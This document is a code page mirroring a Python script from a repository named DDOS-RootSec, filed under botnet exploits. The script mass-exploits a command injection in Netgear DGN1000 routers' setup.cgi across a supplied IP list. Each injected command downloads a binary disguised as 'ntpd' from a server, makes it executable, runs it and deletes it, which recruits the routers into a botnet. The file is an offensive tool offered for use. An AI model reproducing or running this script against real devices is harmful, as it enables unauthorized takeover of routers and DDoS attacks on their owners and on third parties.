Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/DGN1000/dgn1000.py
5038 views
1
#! python !#
2
3
import threading, random, socket, time, sys, requests, re, os
4
5
if len(sys.argv) < 3:
6
print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
7
sys.exit()
8
9
server_ip = "1.1.1.1" # IP of binary server
10
vulns = open(sys.argv[1], "r").readlines()
11
port = int(sys.argv[2]) # PORTS: 80, 8080, 8888, 5000
12
# MAKE SURE TO CONFIGURE URL VARIABLE DEFAULT MIPS BINARY NAME: "ntpd"
13
class send_payload(threading.Thread):
14
def __init__ (self, ip):
15
threading.Thread.__init__(self)
16
self.ip = str(ip).rstrip('\n')
17
def run(self):
18
try:
19
url = "http://" + self.ip + ":" + port + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1"
20
requests.get(url, timeout=8)
21
print "PAYLOAD SENT: %s"%(self.ip)
22
except:
23
pass
24
25
for IP in vulns:
26
try:
27
ip = "".join(IP)
28
ip = ip.replace("\n", "")
29
t = send_payload(ip)
30
t.start()
31
time.sleep(0.09)
32
except:
33
pass
34